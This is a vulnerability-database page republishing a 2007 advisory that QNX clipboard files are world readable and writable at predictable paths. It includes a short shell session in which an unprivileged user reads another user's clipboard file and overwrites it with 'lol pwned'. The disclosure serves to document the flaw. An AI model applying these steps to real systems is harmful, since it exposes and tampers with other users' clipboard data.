Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15887
HistoryJan 28, 2007 - 12:00 a.m.

clipboard bug.txt

2007-01-2800:00:00
vulners.com
10
JSON

The clipboard in QNX is world readable and writable.
Although the folder containing the file is not readable for normal users the filename convention is predictable, see "clipboard bug.jpg"

bash-2.05a$ ls -l /var/clipboard/muh/00000000/TTSHEOAA552983
-rw-rw-rw- 1 root root 78 Jan 04 16:27 /var/clipboard/muh/00000000/TTSHEOAA552983
bash-2.05a$ cat /var/clipboard/muh/00000000/TTSHEOAA552983
N_stringtext%dhcp.client -i en0 -m -u -t 1 -h muh
bash-2.05a$ id
uid=100(kokanin) gid=100(users)
bash-2.05a$ echo "lol pwned" > /var/clipboard/muh/00000000/TTSHEOAA552983
bash-2.05a$

JSON